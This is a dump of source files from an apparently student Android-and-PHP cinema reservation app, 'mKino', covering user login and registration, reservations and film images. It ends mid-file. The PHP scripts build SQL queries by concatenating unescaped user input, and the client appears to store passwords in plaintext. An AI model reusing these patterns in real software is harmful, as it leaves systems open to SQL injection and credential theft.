\"povratnaInformacijaTekst\" => utf8_encode(\"Rezervacija nije uspjela!\"));\r\n \r\n }\r\n else\r\n {\r\n $zapis[0] = array(\"povratnaInformacijaId\" => $kodRezervacije , \"povratnaInformacijaTekst\" => utf8_encode(\"Rezervacija uspjesna!\"));\r\n }\r\n }\r\n else\r\n {\r\n $zapis[0] = array(\"povratnaInformacijaId\" => -7, \"povratnaInformacijaTekst\" => utf8_encode(\"Ulaznice u međuvremenu rezervirane!\"));\r\n } \r\n return $zapis;\r\n }\r\n \r\n \r\n public static function ObrisiMojuRezervaciju($korisnik, $idProjekcije)\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT idKorisnika FROM korisnici WHERE korisnickoIme = '$korisnik'\";\r\n $idKorisnikaTmp = UpitUBazu($upit);\r\n\t\t\t\t\t$idKorisnika = $idKorisnikaTmp[0]['idKorisnika'];\r\n \r\n 
$upit = \"DELETE FROM rezervacije WHERE kod='$idKorisnika-$idProjekcije'\";\r\n $uspjelo = BrisanjeIzBaze($upit);\r\n return $uspjelo;\r\n }\r\n \r\n}\r\n?>" }, { "alpha_fraction": 0.7423256039619446, "alphanum_fraction": 0.7423256039619446, "avg_line_length": 26.289474487304688, "blob_id": "a525832e749adc605296d84ebca55b0467a5046a", "content_id": "32cb993002ea188fbed96672f3ee436c441f3b7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1078, "license_type": "no_license", "max_line_length": 199, "num_lines": 38, "path": "/client-side/src/hr/air/mkino/tipovi/MultipleksInfo.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.tipovi;\r\n\r\n/**\r\n * Ova klasa predstavlja tip podataka koji opisuje pojedini multipleks. Između ostalih podataka se nalaze i svi getteri, dok se jednom uneseni podaci (koristeći konstruktor) ne mogu više promijeniti \r\n * @author domagoj\r\n *\r\n */\r\npublic class MultipleksInfo {\r\n\tprivate int idMultipleksa;\r\n\tprivate String naziv;\r\n\tprivate String oznaka;\r\n\tprivate float zemljopisnaDuzina;\r\n\tprivate float zemljopisnaSirina;\r\n\t\r\n\tpublic MultipleksInfo(int idMultipleksa, String naziv, String oznaka, float zemljopisnaDuzina, float zemljopisnaSirina) {\r\n\t\tthis.idMultipleksa = idMultipleksa;\r\n\t\tthis.naziv = naziv;\r\n\t\tthis.oznaka = oznaka;\r\n\t\tthis.zemljopisnaDuzina = zemljopisnaDuzina;\r\n\t\tthis.zemljopisnaSirina = zemljopisnaSirina;\r\n\t}\r\n\t\r\n\tpublic int getIdMultipleksa() {\r\n\t\treturn idMultipleksa;\r\n\t}\r\n\tpublic String getNaziv() {\r\n\t\treturn naziv;\r\n\t}\r\n\tpublic String getOznaka() {\r\n\t\treturn oznaka;\r\n\t}\r\n\tpublic float getZemljopisnaDuzina() {\r\n\t\treturn zemljopisnaDuzina;\r\n\t}\r\n\tpublic float getZemljopisnaSirina() {\r\n\t\treturn zemljopisnaSirina;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.678856372833252, "alphanum_fraction": 0.678856372833252, "avg_line_length": 17.789474487304688, "blob_id": "cdc5d6a9ce5b46bf95afc1116e38f93e30378916", "content_id": "933cccc232d5cc457a6adeb471da6a682c1cba10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1504, "license_type": "no_license", "max_line_length": 122, "num_lines": 76, "path": "/client-side/src/hr/air/mkino/tipovi/ProjekcijaInfo.java", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "package hr.air.mkino.tipovi;\r\n/**\r\n * Klasa koja predstavlja slozeni tip podataka o projekcijama.\r\n * @author bstivic\r\n *\r\n */\r\npublic class ProjekcijaInfo {\r\n\tprivate int idProjekcije;\r\n\tprivate int dvorana;\r\n\tprivate FilmInfo film;\r\n\tprivate String vrijemePocetka;\r\n\tprivate int multipleks;\r\n\tprivate float cijena;\r\n\t\r\n\tpublic ProjekcijaInfo(int idProjekcije, int dvorana, FilmInfo film, String vrijemePocetka, int multipleks, float cijena){\r\n\t\tthis.idProjekcije = idProjekcije;\r\n\t\tthis.dvorana = dvorana;\r\n\t\tthis.film = film;\r\n\t\tthis.vrijemePocetka = vrijemePocetka;\r\n\t\tthis.multipleks = multipleks;\r\n\t\tthis.cijena = cijena;\r\n\t}\r\n\t\r\n\tpublic float getCijena(){\r\n\t\treturn cijena;\r\n\t}\r\n\tpublic int getidProjekcije(){\r\n\t\treturn idProjekcije;\r\n\t}\r\n\tpublic int getDvorana(){\r\n\t\treturn dvorana;\r\n\t}\r\n\tpublic String getVrijemePocetka()\r\n\t{\r\n\t\treturn vrijemePocetka;\r\n\t}\r\n\tpublic int getMultipleks(){\r\n\t\treturn multipleks;\r\n\t}\r\n\t\r\n\tpublic int getIdFilma() {\r\n\t\treturn 
film.getIdFilma();\r\n\t}\r\n\r\n\tpublic String getNaziv() {\r\n\t\treturn film.getNaziv();\r\n\t}\r\n\r\n\tpublic String getOpis() {\r\n\t\treturn film.getOpis();\r\n\t}\r\n\r\n\tpublic String getRedatelj() {\r\n\t\treturn film.getRedatelj();\r\n\t}\r\n\r\n\tpublic String getGlavneUloge() {\r\n\t\treturn film.getGlavneUloge();\r\n\t}\r\n\r\n\tpublic int getTrajanje() {\r\n\t\treturn film.getTrajanje();\r\n\t}\r\n\r\n\tpublic int getGodina() {\r\n\t\treturn film.getGodina();\r\n\t}\r\n\r\n\tpublic String getZanr() {\r\n\t\treturn film.getZanr();\r\n\t}\r\n\r\n\tpublic int getAktualno() {\r\n\t\treturn film.getAktualno();\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.6274632215499878, "alphanum_fraction": 0.6365342736244202, "avg_line_length": 40.6533317565918, "blob_id": "aec7307c051754666adab1c883143d29455b4a1b", "content_id": "4896a99c30e08f976f3b710045f688dba27607fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3208, "license_type": "no_license", "max_line_length": 231, "num_lines": 75, "path": "/server-side/Datoteke/skripte/korisnici.php", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "<?php\r\n\tclass Korisnici\r\n\t{\r\n\t\tpublic static function PrijaviSe($korisnickoIme, $lozinka)\r\n\t\t{\r\n\t\t\trequire_once 'DB_connect.php';\r\n\t\t\t$upit = \"SELECT * FROM korisnici WHERE korisnickoIme = '$korisnickoIme'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['povratnaInformacijaId']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 2, 'povratnaInformacijaTekst' => utf8_encode('Nepostojeći korisnik')));\r\n\t\t\t} else\r\n\t\t\t{\r\n\t\t\t\t$lozinkaHash = hash('sha512', $lozinka . $korisnik[0]['salt']);\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t$upit = \"SELECT idKorisnika, korisnickoIme, ime, prezime, email, telefon FROM korisnici WHERE korisnickoIme = '$korisnickoIme' AND lozinka = '$lozinkaHash'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['povratnaInformacijaId']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 3, 'povratnaInformacijaTekst' => utf8_encode('Pogrešna lozinka')));\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn $korisnik;\r\n\t\t}\r\n\t\t\r\n\t\tpublic static function RegistrirajSe($podaci)\r\n\t\t{\r\n\t\t\trequire_once 'DB_connect.php';\r\n\t\t\t// provjeravamo postoji li korisničko ime već u bazi\r\n\t\t\t$upit = \"SELECT * FROM korisnici WHERE korisnickoIme = '\" . $podaci['korisnickoIme'] . \"'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['korisnickoIme']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 4, 'povratnaInformacijaTekst' => utf8_encode('Korisnik već postoji'))); \r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t// provjeravamo postoji li email već u bazi\r\n\t\t\t$upit = \"SELECT * FROM korisnici WHERE email = '\" . $podaci['email'] . \"'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['email']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 5, 'povratnaInformacijaTekst' => utf8_encode('Email adresa već postoji'))); \r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t// provjeravamo postoji li telefon već u bazi\r\n\t\t\t$upit = \"SELECT * FROM korisnici WHERE telefon = '\" . $podaci['telefon'] . 
\"'\";\r\n\t\t\t$korisnik = UpitUBazu($upit);\r\n\t\t\tif (isset($korisnik[0]['telefon']))\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 6, 'povratnaInformacijaTekst' => utf8_encode('Taj telefonski broj već postoji'))); \r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t// ako se nije dogodio nikakav konflikt, dodajemo korisnika u bazu\r\n\t\t\t$upit = \"INSERT INTO korisnici VALUES (DEFAULT, '\".$podaci['korisnickoIme'].\"', '\".$podaci['lozinka'].\"', '\".$podaci['salt'].\"', '\".$podaci['ime'].\"', '\".$podaci['prezime'].\"', '\".$podaci['email'].\"', '\".$podaci['telefon'].\"')\";\r\n\t\t\t$uspjeh = Upit($upit);\r\n\t\t\t\r\n\t\t\tif ($uspjeh)\r\n\t\t\t{\r\n\t\t\t\t// pronalazimo id trenutno unesenog korisnika\r\n\t\t\t\t$upit2 = \"SELECT idKorisnika from korisnici WHERE korisnickoIme = '\" . $podaci['korisnickoIme'] . \"'\";\r\n\t\t\t\t$id = UpitUBazu($upit2);\r\n\t\t\t\t\r\n\t\t\t\t// unosimo jednu praznu rezervaciju\r\n\t\t\t\t$idk = $id[0]['idKorisnika'];\r\n\t\t\t\t$upit3 = \"INSERT INTO rezervacije (projekcija, korisnik, brojSjedala, kod) VALUES ($idk, $idk, $idk, '$idk-0')\";\r\n\t\t\t\tUpit($upit3);\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 0, 'povratnaInformacijaTekst' => utf8_encode('Korisnik uspješno dodan'))); \r\n\t\t\t} else\r\n\t\t\t{\r\n\t\t\t\treturn array(array('povratnaInformacijaId' => 7, 'povratnaInformacijaTekst' => utf8_encode('Korisnika nije bilo moguće dodati u bazu. Razlog nepoznat'))); \r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n?>" }, { "alpha_fraction": 0.6949654221534729, "alphanum_fraction": 0.6957058310508728, "avg_line_length": 33.85840606689453, "blob_id": "ca7b1579edf2af32971bb5a680face7ab75c167f", "content_id": "2aa197343f48ddf0b5c49ac62eaa9a3bdbfbb3c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4063, "license_type": "no_license", "max_line_length": 118, "num_lines": 113, "path": "/client-side/src/hr/air/mkino/core/Prijava.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.core;\r\n\r\nimport android.app.Dialog;\r\nimport android.content.Context;\r\nimport android.view.View;\r\nimport android.view.Window;\r\nimport android.view.View.OnClickListener;\r\nimport android.widget.Button;\r\nimport android.widget.EditText;\r\nimport android.widget.Toast;\r\nimport hr.air.mkino.R;\r\nimport hr.air.mkino.baza.PrijavljeniKorisnikAdapter;\r\nimport hr.air.mkino.server.JsonPrijava;\r\nimport hr.air.mkino.tipovi.Korisnik;\r\n\r\n/**klasa poslovne logike koja služi za prikaz dijaloga prijave i izvršavanje prijave*/\r\npublic class Prijava {\r\n\t\r\n\t/**\r\n\t * Metoda koja prikazuje dijalog za prijavu u aplikaciju\r\n\t * @param aktivni Context\r\n\t * */\r\n\tpublic void prikaziDijalog(final Context context) {\r\n\t\t\tfinal Dialog dialogPrijava = new Dialog(context);\r\n\t\t\tdialogPrijava.requestWindowFeature(Window.FEATURE_NO_TITLE);\r\n\t\t\tdialogPrijava.setContentView(R.layout.dialog_prijava);\t\t\t\r\n\t\t\tdialogPrijava.show();\r\n\t\t\t\r\n\t\t\t/*dohvaćanje unešenih podataka*/\t\t\t\r\n\t\t\tButton btnPrijaviSe = (Button)dialogPrijava.findViewById(R.id.dialog_prijava_btnPrijaviSe);\r\n\t\t\tButton btnOdustani = (Button) dialogPrijava.findViewById(R.id.dijalog_prijava_btnOdustani);\r\n\t\t\tButton btnRegistracija = (Button)dialogPrijava.findViewById(R.id.prijava_btnRegistrirajSe);\r\n\t\t\t\r\n\t\t\tfinal EditText txtKorisnickoIme = (EditText) dialogPrijava.findViewById(R.id.dialog_registracija_txtKorisnickoIme);\r\n\t\t\tfinal EditText 
txLozinka = (EditText)dialogPrijava.findViewById(R.id.dialog_registracija_txtLozinka);\r\n\t\t\t\r\n\t\t\t/*odustani od prijave*/\r\n\t\t\tbtnOdustani.setOnClickListener(new OnClickListener() {\r\n\t\t\t\t\t@Override\r\n\t\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\t\tdialogPrijava.dismiss();\r\n\r\n\t\t\t\t\t}\r\n\t\t\t\t});\r\n\t\t\t\t\t\r\n\t\t\t/*klik na prijavu*/\r\n\t\t\tbtnPrijaviSe.setOnClickListener(new OnClickListener() {\r\n\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\t\t\t\t\r\n\t\t\t\t\tString tKorisnickoIme= txtKorisnickoIme.getText().toString();\r\n\t\t\t\t\tString tLozinka = txLozinka.getText().toString();\r\n\t\t\t\t\t\r\n\t\t\t\t\t/*validacija na klijentskoj strani*/\r\n\t\t\t\t\tif(tKorisnickoIme == null || tKorisnickoIme.length() ==0)\r\n\t\t\t\t\t\tToast.makeText(context, \"Unesite korisničko ime\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\r\n\t\t\t\t\telse if(tLozinka == null || tLozinka.length() ==0)\r\n\t\t\t\t\t\tToast.makeText(context, \"Unesite lozinku\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\r\n\t\t\t\t\telse{\r\n\t\t\t\t\t\tJsonPrijava novaPrijava = new JsonPrijava();\r\n\t\t\t\t\t\t/*instanciranje objekta Korisnik koji ce sluziti za prijavu*/\r\n\t\t\t\t\t\tKorisnik prijava = novaPrijava.prijavi(tKorisnickoIme, tLozinka);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t/*uspješna prijava*/\r\n\t\t\t\t\t\tif(prijava != null)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tToast.makeText(context, \"Uspješno ste prijavljeni!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\t\tPrijavljeniKorisnikAdapter prijavljeniKorisnikAdapter = new PrijavljeniKorisnikAdapter(context);\r\n\t\t\t\t\t\t\tif(prijavljeniKorisnikAdapter.pohraniKorisnickePodatke(tKorisnickoIme, tLozinka) > \t0)\r\n\t\t\t\t\t\t\t\tToast.makeText(context, \"zapamtio u bazu\", Toast.LENGTH_SHORT);\r\n\t\t\t\t\t\t\tdialogPrijava.dismiss();\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t/*neuspješna prijava*/\r\n\t\t\t\t\t\t\tToast.makeText(context, \"Neuspješna prijava!\", Toast.LENGTH_SHORT).show();\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\t\t\t\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t});\r\n\t\t\t\r\n\t\t\t/*klik na registraciju koji otvara dijalog za registraciju korisnika*/\r\n\t\t\tbtnRegistracija.setOnClickListener(new OnClickListener() {\r\n\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\t/*zatvaramo dijalog za prijavu*/\r\n\t\t\t\t\tdialogPrijava.dismiss();\r\n\t\t\t\t\t\r\n\t\t\t\t\t/*prikazujemo dijalog za registraciju*/\r\n\t\t\t\t\tRegistracija registracije = new Registracija();\r\n\t\t\t\t\tregistracije.prikaziDijalog(context);\t\t\t\t\t\r\n\t\t\t\t}\t\t\t\t\r\n\t\t\t});\r\n\t\t\t\r\n\t\t\t\r\n\t\t}\r\n\t\r\n\t/**\r\n\t * Metoda koja odjavljuje korisnika iz aplikacije\r\n\t * @param trenutni Context\r\n\t * */\r\n\tpublic void odjava(Context context)\r\n\t{\r\n\t\tPrijavljeniKorisnikAdapter prijavljeniKorisnik = new PrijavljeniKorisnikAdapter(context);\r\n\t\t/*brišemo prijavljenog korisnika iz lokalne baze podataka*/\r\n\t\tprijavljeniKorisnik.obrisiPrijavljenogKorisnika();\r\n\t\tToast.makeText(context, \"Uspješno ste se odjavili\", Toast.LENGTH_SHORT).show();\r\n\t}\r\n\t\r\n}\r\n" }, { "alpha_fraction": 0.6925264000892639, "alphanum_fraction": 0.6949634552001953, "avg_line_length": 26.79532241821289, "blob_id": "3dddd9fc5e3022338a5f6bf2c8d790f93adabafe", "content_id": "35394b063b1dee6e5e67417572c75f9de34f0959", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4941, "license_type": "no_license", 
"max_line_length": 146, "num_lines": 171, "path": "/client-side/src/hr/air/mkino/server/SlikaSaServera.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport hr.air.mkino.sucelja.ISlikaFilma;\r\n\r\nimport java.io.File;\r\nimport java.io.FileNotFoundException;\r\nimport java.io.FileOutputStream;\r\nimport java.io.IOException;\r\nimport java.io.InputStream;\r\nimport java.net.HttpURLConnection;\r\nimport java.net.MalformedURLException;\r\nimport java.net.URL;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport android.content.Context;\r\nimport android.graphics.Bitmap;\r\nimport android.graphics.BitmapFactory;\r\nimport android.os.AsyncTask;\r\nimport android.os.Environment;\r\nimport android.util.DisplayMetrics;\r\n\r\n/**\r\n * Služi za dohvaćanje slike filma sa servera.\r\n * U konstruktoru prima identifikacijsku oznaku filma, koju onda poslije koristi u metodama za dohvat slike.\r\n * @author domagoj\r\n *\r\n */\r\npublic class SlikaSaServera extends AsyncTask<String, Void, Bitmap> implements ISlikaFilma {\r\n\tprivate Context context;\r\n\tprivate int idFilma;\r\n\t\r\n\tpublic SlikaSaServera(Context context, int idFilma) {\r\n\t\tthis.context = context;\r\n\t\tthis.idFilma = idFilma;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Dohvaća sliku filma u velikom formatu\r\n\t * @return Bitmap objekt slike\r\n\t */\r\n\tpublic Bitmap dohvatiVelikuSliku()\r\n\t{\r\n\t\tString url = \"http://mkinoairprojekt.me.pn/skripte/index.php?tip=slike&id=\" + idFilma;\r\n\t\tthis.execute(url);\r\n\t\tBitmap slika = null;\r\n\t\ttry {\r\n\t\t\tslika = this.get();\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\tpohraniSlikuNaSD(slika, true);\r\n\t\treturn slika;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Dohvaća sliku filma u malom formatu\r\n\t * @return Bitmap objekt slike\r\n\t */\r\n\tpublic Bitmap dohvatiMaluSliku()\r\n\t{\r\n\t\tString url = \"http://mkinoairprojekt.me.pn/skripte/index.php?tip=slikemale&id=\" + idFilma;\r\n\t\tthis.execute(url);\r\n\t\tBitmap slika = null;\r\n\t\ttry {\r\n\t\t\tslika = promijeniVelicinuMaleSlike(this.get());\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\tpohraniSlikuNaSD(slika, false);\r\n\t\treturn slika;\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * Nakon što se slika preuzme s interneta, potrebno ju je pohraniti na SD karticu u svrhu cachiranja\r\n\t * @param slika koju treba pohraniti\r\n\t * @param velikaSlika radi li se o velikoj slici ili maloj (sa ListView-a)\r\n\t */\r\n\tprivate void pohraniSlikuNaSD(Bitmap slika, boolean velikaSlika) {\r\n\t\tString putanjaDoSlike;\r\n\t\tString sdKartica = Environment.getExternalStorageDirectory().getPath();\r\n\t\t\r\n\t\tif (velikaSlika)\r\n\t\t{\r\n\t\t\tputanjaDoSlike = sdKartica + \"/mKino/\" + idFilma + \".jpg\";\r\n\t\t} else\r\n\t\t{\r\n\t\t\tputanjaDoSlike = sdKartica + \"/mKino/\" + idFilma + \"_mala.jpg\";\r\n\t\t}\r\n\t\t\r\n\t\t// najprije napravimo direktorij \"mKino\" na SD kartici (ukoliko taj direktorij ne postoji)\r\n\t\tFile direktorij = new File(sdKartica + \"/mkino\");\r\n\t\tif (!direktorij.exists())\r\n\t\t{\r\n\t\t\tdirektorij.mkdir();\r\n\t\t}\r\n\t\t\r\n\t\t// nakon što znamo da direktorij \"mKino\" postoji na SD kartici, čuvamo podatke na njoj\r\n\t\ttry {\r\n\t\t\tFileOutputStream tok = new 
FileOutputStream(putanjaDoSlike);\r\n\t\t\tslika.compress(Bitmap.CompressFormat.JPEG, 90, tok);\r\n\t\t\ttok.close();\r\n\t\t} catch (FileNotFoundException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (IOException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t}\r\n\r\n\t/**\r\n\t * Ova metoda mijenja veličinu malih slika. Veličinu preuzetih slika je potrebno promijeniti kako bi prikazane slike zauzimale što manje memorije\r\n\t * @param velika slika\r\n\t * @return mala slika ili originalna ukoliko nije potrebno mijenjati veličinu\r\n\t */\r\n\tprivate Bitmap promijeniVelicinuMaleSlike(Bitmap slika) {\r\n\t\tint sirinaVisina = 0;\r\n\t\t\r\n\t\t// provjeravamo je li razlučivost xhdpi, hdpi, mdpi ili ldpi\r\n\t\tswitch(context.getResources().getDisplayMetrics().densityDpi)\r\n\t\t{\r\n\t\t\tcase DisplayMetrics.DENSITY_LOW:\r\n\t\t\t\tsirinaVisina = 60; break;\r\n\t\t\tcase DisplayMetrics.DENSITY_MEDIUM:\r\n\t\t\t\tsirinaVisina = 80; break;\r\n\t\t\tcase DisplayMetrics.DENSITY_HIGH:\r\n\t\t\t\tsirinaVisina = 120; break;\r\n\t\t}\r\n\t\t\r\n\t\t// ako se širina(visina) slike nije promijenila, a to je u slučaju kada je telefon xhdpi ili xxhdpi, tada ju nećemo ni resize-ati,\r\n\t\t// nego ćemo vratiti staru vrijednost slike (else). U suprotnom ćemo vratiti resize-anu vrijednost\r\n\t\tif (sirinaVisina != 0)\r\n\t\t{\r\n\t\t\tBitmap novaSlika = Bitmap.createScaledBitmap(slika, sirinaVisina, sirinaVisina, false);\r\n\t\t\treturn novaSlika;\r\n\t\t} else\r\n\t\t{\r\n\t\t\treturn slika;\r\n\t\t}\r\n\t}\r\n\r\n\t@Override\r\n\tprotected Bitmap doInBackground(String... parametri) {\r\n\t\tString urlString = parametri[0];\r\n\t\tURL url;\r\n\t\tHttpURLConnection veza;\r\n\t\tBitmap slika = null;\r\n\t\t\r\n\t\ttry {\r\n\t\t\turl = new URL(urlString);\r\n\t\t\tveza = (HttpURLConnection) url.openConnection();\r\n\t\t\tveza.setDoInput(true);\r\n\t\t\tveza.connect();\r\n\t\t\tInputStream tok = veza.getInputStream();\r\n\t\t\tslika = BitmapFactory.decodeStream(tok);\r\n\t\t\tveza.disconnect();\r\n\t\t} catch (MalformedURLException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (IOException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\treturn slika;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7036688327789307, "alphanum_fraction": 0.7036688327789307, "avg_line_length": 25.973684310913086, "blob_id": "cfc7a86f0a99fd5b110d0d3fbf0b94f54ad50fa9", "content_id": "4751ee4b797152d38b5ac143a070e507e22a432c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 131, "num_lines": 38, "path": "/client-side/src/hr/air/mkino/sd/LokalnaSlika.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.sd;\r\n\r\nimport android.graphics.Bitmap;\r\nimport android.graphics.BitmapFactory;\r\nimport android.os.Environment;\r\nimport hr.air.mkino.sucelja.ISlikaFilma;\r\n\r\n/**\r\n * Služi za dohvaćanje slike filma sa SD kartice.\r\n * Za konstruktor prima ID filma kojeg dalje koristi u metodama.\r\n * @author domagoj\r\n *\r\n */\r\npublic class LokalnaSlika implements ISlikaFilma {\r\n\tint idFilma;\r\n\t\r\n\tpublic LokalnaSlika(int idFilma) {\r\n\t\tthis.idFilma = idFilma;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Dohvaća sliku filma u velikom formatu.\r\n\t * @return Bitmap objekt slike\r\n\t */\r\n\tpublic Bitmap dohvatiVelikuSliku() {\r\n\t\tBitmap slika = BitmapFactory.decodeFile(Environment.getExternalStorageDirectory().getPath() + \"/mKino/\" + idFilma + 
\".jpg\");\r\n\t\treturn slika;\r\n\t}\r\n\r\n\t/**\r\n\t * Dohvaća sliku filma u malom formatu (najčešće za prikaz u ListView-u).\r\n\t * @return Bitmap objekt slike\r\n\t */\r\n\tpublic Bitmap dohvatiMaluSliku() {\r\n\t\tBitmap slika = BitmapFactory.decodeFile(Environment.getExternalStorageDirectory().getPath() + \"/mKino/\" + idFilma + \"_mala.jpg\");\r\n\t\treturn slika;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.7088446617126465, "alphanum_fraction": 0.7140541672706604, "avg_line_length": 36.05286407470703, "blob_id": "941c72857991b02d2d09980fa0e482547a7bc021", "content_id": "24ce0c5a9a45a1cdcd75d3615c7d1cb1c528e6f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8668, "license_type": "no_license", "max_line_length": 130, "num_lines": 227, "path": "/client-side/src/hr/air/mkino/ProjekcijeActivity.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino;\r\n\r\nimport hr.air.mkino.core.Rezervacija;\r\nimport hr.air.mkino.listviewadapteri.StavkaProjekcije;\r\nimport hr.air.mkino.server.JsonFilmovi;\r\nimport hr.air.mkino.server.JsonProjekcije;\r\nimport hr.air.mkino.tipovi.ProjekcijaInfo;\r\nimport java.text.SimpleDateFormat;\r\nimport java.util.ArrayList;\r\nimport java.util.Date;\r\nimport java.util.List;\r\nimport android.app.Activity;\r\nimport android.content.Intent;\r\nimport android.os.Bundle;\r\nimport android.view.View;\r\nimport android.widget.AdapterView;\r\nimport android.widget.AdapterView.OnItemSelectedListener;\r\nimport android.widget.ArrayAdapter;\r\nimport android.widget.ListView;\r\nimport android.widget.Spinner;\r\nimport android.widget.TextView;\r\nimport android.widget.AdapterView.OnItemClickListener;\r\n\r\n/**Klasa koja služi za prikaz projekcija.\r\n * \r\n * @author bstivic\r\n */\r\npublic class ProjekcijeActivity extends Activity {\r\n\tprivate Spinner odabirGrada;\r\n\tprivate Spinner odabirDatuma;\r\n\tprivate ListView popisProjekcija;\r\n\tprivate List<ProjekcijaInfo> projekcije;\r\n\t\r\n\t\r\n\t@Override\r\n\tprotected void onCreate(Bundle savedInstanceState) {\r\n\t\t\r\n\t\tsuper.onCreate(savedInstanceState);\r\n\t\tsetContentView(R.layout.activity_projekcije);\r\n\t\tsetTitle(\"Popis projekcija\");\r\n\t\t\r\n\t\t// inicijaliziramo klasne varijable\r\n\t\todabirGrada = (Spinner) findViewById(R.id.rezervacije_spinner_grad);\r\n\t\todabirDatuma = (Spinner) findViewById(R.id.rezervacije_spiner_datum);\r\n\t\tpopisProjekcija= (ListView) findViewById(R.id.rezervacije_popis_projekcija);\r\n\t\r\n\t\tint odabraniMultipleks = dohvatiOdabraniMultipleks();\r\n\r\n\t\t// postavljamo spinner na trenutno odabrani multipleks\r\n\t\todabirGrada.setSelection(odabraniMultipleks-1);\r\n\t\t\r\n\t\t// dohvaćamo aktualne filmove s web servisa, i pritom punimo/modificiramo lokalnu bazu filmova iz koje će se kasnije vući podaci\r\n\t\tJsonFilmovi jf = new JsonFilmovi();\r\n\t\tjf.dohvatiFilmove(this);\r\n\t\t\r\n\t\t//postavljamo spinner na današnji datum i popunjavamo ga sa datumima u iduća dva tjedna\r\n\t\tArrayList<String> dani = new ArrayList<String>();\r\n\t\t\r\n\t\t Date sadasnjiDatum = new Date();\r\n\t\t SimpleDateFormat formatDatuma = new SimpleDateFormat(\"dd.MM.yyyy\");\r\n\r\n\t\t //Zapisujemo 14 slijedećih kalendarskih dana u spinner\r\n\t\t for (int i = 0; i < 14; i++)\r\n\t\t {\t\t\t\r\n\t\t \tdani.add(formatDatuma.format(sadasnjiDatum)+\" \" +vratiDanUTjednu(sadasnjiDatum));\r\n\t\t \tsadasnjiDatum = Rezervacija.dodajDan(sadasnjiDatum, 1);\r\n\t\t }\r\n\t\t 
